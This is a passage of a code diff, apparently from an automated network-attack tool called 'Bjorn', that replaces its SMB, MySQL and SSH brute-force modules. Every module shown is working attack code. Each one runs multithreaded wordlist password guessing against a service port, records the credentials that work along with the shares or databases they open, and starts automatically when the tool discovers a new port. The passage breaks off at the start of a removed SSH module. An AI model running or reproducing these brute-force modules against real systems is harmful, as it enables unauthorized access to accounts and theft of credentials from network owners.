service="smb",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=share, # utilise la colonne 'database' pour distinguer les shares
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=share
)
else:
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
self.results = []
def removeduplicates(self):
# plus nécessaire avec l'index unique; conservé pour compat.
pass
if __name__ == "__main__":
# Mode autonome non utilisé en prod; on laisse simple
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
logger.info("SMB brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,261 +0,0 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

304
actions/sql_bruteforce.py Normal file
View File

@@ -0,0 +1,304 @@
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads)
"""
import os
import pymysql
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
b_class = "SQLBruteforce"
b_module = "sql_bruteforce"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
b_service = '["sql"]'
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class SQLBruteforce:
"""Wrapper orchestrateur -> SQLConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_bruteforce = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""Lance le bruteforce SQL pour (ip, port)."""
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SQLBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
"""
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
"""
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=port,
connect_timeout=timeout,
read_timeout=timeout,
write_timeout=timeout,
)
try:
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
finally:
try:
conn.close()
except Exception:
pass
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('sql',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='sql'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread to process SQL bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_sql", 0) > 0:
time.sleep(self.shared_data.timewait_sql)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SQL dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
try:
self.shared_data.db.insert_cred(
service="sql",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=dbname,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=dbname
)
else:
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
self.results = []
def remove_duplicates(self):
# inutile avec l’index unique; conservé pour compat.
pass
if __name__ == "__main__":
try:
sd = SharedData()
sql_bruteforce = SQLBruteforce(sd)
logger.info("SQL brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,204 +0,0 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# Première tentative sans spécifier de base de données
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# Si la connexion réussit, récupérer la liste des bases de données
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Sauvegarder les informations avec la liste des bases trouvées
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Ajouter une entrée pour chaque base de données trouvée
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

327
actions/ssh_bruteforce.py Normal file
View File

@@ -0,0 +1,327 @@
"""
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
to find accessible accounts using various user credentials. It logs the results of
successful connections.
SQL version (minimal changes):
- Targets still provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
"""
import os
import paramiko
import socket
import threading
import logging
import time
import datetime
from queue import Queue
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
# Silence Paramiko internals
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
"paramiko.kex", "paramiko.auth_handler"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_bruteforce"
b_status = "brute_force_ssh"
b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70 # tu peux ajuster la priorité si besoin
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class SSHBruteforce:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_bruteforce = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""Run the SSH brute force attack on the given IP and port."""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Execute the brute force attack and update status (for UI badge)."""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjorn_orch_status = "SSHBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": port}
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""Handles the connection attempts and DB persistence."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Load wordlists (unchanged behavior)
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Build initial IP -> (MAC, hostname) cache from DB
self._ip_to_identity = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
self.progress = None
# ---- Mapping helpers (DB) ------------------------------------------------
def _refresh_ip_identity_cache(self):
"""Load IPs from DB and map them to (mac, current_hostname)."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---- File utils ----------------------------------------------------------
@staticmethod
def _read_lines(path: str):
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---- SSH core ------------------------------------------------------------
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try:
ssh.connect(
hostname=adresse_ip,
username=user,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
look_for_keys=False, # avoid slow key probing
allow_agent=False, # avoid SSH agent delays
)
return True
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
return False
except Exception as e:
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
return False
finally:
try:
ssh.close()
except Exception:
pass
# ---- Robust DB upsert fallback ------------------------------------------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
"""
Insert-or-update without relying on ON CONFLICT columns.
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
"""
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
# 1) Insert if missing
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ssh',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
# 2) Update password/hostname if present (or just inserted)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ssh'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---- Worker / Queue / Threads -------------------------------------------
def worker(self, success_flag):
"""Worker thread to process items in the queue (bruteforce attempts)."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ssh_connect(adresse_ip, user, password, port=port):
with self.lock:
# Persist success into DB.creds
try:
self.shared_data.db.insert_cred(
service="ssh",
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
# Specific fix: fallback manual upsert
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None
)
else:
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
time.sleep(self.shared_data.timewait_ssh)
def run_bruteforce(self, adresse_ip, port):
"""
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SSH dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("SSH brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,198 +0,0 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
